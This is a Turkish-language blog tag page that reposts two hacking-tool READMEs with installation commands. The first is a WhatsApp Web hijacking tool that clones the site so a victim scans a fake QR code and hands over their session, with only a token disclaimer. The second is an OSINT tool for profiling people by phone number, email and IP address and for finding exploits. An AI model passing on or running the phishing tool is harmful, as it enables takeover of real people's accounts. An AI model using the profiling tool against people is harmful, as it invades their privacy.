#cloudsecurity #computers #Cyber #cyberattack #Cybersecurity #cybersecuritythreats #cyberthreats #datasecurity #EthicalHacking #hacked #Hackers #Hacking #informationsecurity #infosec #iot #IT etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
#cloudsecurity #computers #Cyber #cyberattack #Cybersecurity #cybersecuritythreats #cyberthreats #datasecurity #EthicalHacking #hacked #Hackers #Hacking #informationsecurity #infosec #iot #IT etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

17 Eylül 2023 Pazar

whatsapp-hacking

WhatsApp-hacking

Hack WhatsApp web
Hack WhatsApp web via a cloned website

Requirements
• Python >= 3.6.3 • Flask==1.0.2 • Selenium==3.7.0 • Gecko Driver

Disclaimer
THIS IS FOR DEMONSTRATIVE PURPOSES ONLY.

DO NOT USE ON REAL VICTIMS FOR ANY REASON. CRIMINAL LAW WILL APPLY.

Installation
pkg install python3

git clone https://github.com/TermuxHackz/whatsapp-hacking

cd whatsapp-hacking

_install the requirements

pip install -r requirements.txt

_Run the grabber

python3 grabber.py

_Run the Server

python3 server.py

As the victim scans the QR on the fake website, WhatsApp web on the browser spawned by the grabber will be connected to the victim's number.


16 Eylül 2023 Cumartesi

X-Osint

X-osint
This is an osint tool which gathers useful and yet credible valid information about a phone number, user's email address and ip address and more to come in future updates.




Features
IP Address information gathering
Email Address information gathering
Phone number information gathering
Host finding
Ports finding
Subdomain Enumeration
CVE Exploits Finder
Email Finder
Exploit Open Source Vulnerability Database
DNS Lookup
DNS Reverse
Vin extractor
Protonmail OSINT And many more...

Requirements
python-3
pip
Internet Connection
And some other python packages

Installation
cd $HOME
git clone https://github.com/TermuxHackz/X-osint
cd X-osint
chmod +x *
bash setup.sh

Installation using python virtual environment if normal installation doesnt work
The normal installation of Xosint might likely have some issues running or installing due to some missing python packages, use this method only if the normal installation and usage doesnt work!!

cd $HOME
git clone https://github.com/TermuxHackz/X-osint
cd X-osint
chmod +x *.sh
python3 -m venv X-osint_venv
source X-osint_venv/bin/activate�./setup.sh
pip install google
python xosint